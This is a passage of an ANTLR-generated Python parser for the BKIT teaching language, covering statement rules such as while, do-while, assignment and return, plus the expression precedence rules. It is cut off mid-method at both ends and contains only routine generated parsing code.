self.match(BKITParser.ASSIGN)\n self.state = 185\n self.expr()\n self.state = 186\n self.match(BKITParser.COMMA)\n self.state = 187\n self.expr()\n self.state = 188\n self.match(BKITParser.COMMA)\n self.state = 189\n self.expr()\n self.state = 190\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 191\n self.match(BKITParser.DO)\n 
self.state = 192\n self.stmt_list()\n self.state = 193\n self.match(BKITParser.ENDFOR)\n self.state = 194\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitWhile_stmt\" ):\n return visitor.visitWhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.match(BKITParser.WHILE)\n self.state = 197\n self.expr()\n self.state = 198\n self.match(BKITParser.DO)\n self.state = 199\n self.stmt_list()\n self.state = 200\n self.match(BKITParser.ENDWHILE)\n self.state = 201\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n 
super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitDowhile_stmt\" ):\n return visitor.visitDowhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 203\n self.match(BKITParser.DO)\n self.state = 204\n self.stmt_list()\n self.state = 205\n self.match(BKITParser.WHILE)\n self.state = 206\n self.expr()\n self.state = 207\n self.match(BKITParser.ENDDO)\n self.state = 208\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, 
visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 212\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 210\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.state = 211\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitBreak_stmt\" ):\n return visitor.visitBreak_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, 
invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitContinue_stmt\" ):\n return visitor.visitContinue_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 219\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 
1)\n self.state = 221\n self.match(BKITParser.ID)\n self.state = 222\n self.match(BKITParser.LEFT_PAREN)\n self.state = 233\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 223\n self.expr()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 224\n self.match(BKITParser.COMMA)\n self.state = 225\n self.expr()\n self.state = 230\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 235\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 236\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitReturn_stmt\" ):\n return visitor.visitReturn_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 238\n 
self.match(BKITParser.RETURN)\n self.state = 240\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 239\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return 
BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 247\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 242\n self.expr1(0)\n self.state = 243\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 244\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 246\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return 
BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 32\n self.enterRecursionRule(localctx, 32, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 250\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 257\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 252\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 253\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 254\n self.expr2(0) \n self.state = 259\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return 
self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 34\n self.enterRecursionRule(localctx, 34, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 261\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 268\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 263\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 264\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 
265\n self.expr3(0) \n self.state = 270\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr3\" ):\n return visitor.visitExpr3(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 36\n self.enterRecursionRule(localctx, 36, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 272\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 279\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, 
_parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 274\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 275\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 276\n self.expr4() \n self.state = 281\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr4\" ):\n return visitor.visitExpr4(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_expr4)\n try:\n self.state = 285\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 282\n self.match(BKITParser.NOT)\n self.state 
= 283\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 284\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr5\" ):\n return visitor.visitExpr5(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 290\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 288\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, 
BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 289\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr6\" ):\n return visitor.visitExpr6(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_expr6)\n try:\n self.state = 294\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,20,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 293\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_cellContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return 
self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_cell\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_cell\" ):\n return visitor.visitArray_cell(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_cell(self):\n\n localctx = BKITParser.Array_cellContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_array_cell)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 296\n self.expr7()\n self.state = 301 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 297\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 298\n self.expr()\n self.state = 299\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 303 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def 
accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr7\" ):\n return visitor.visitExpr7(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_expr7)\n try:\n self.state = 307\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 306\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr8\" ):\n return 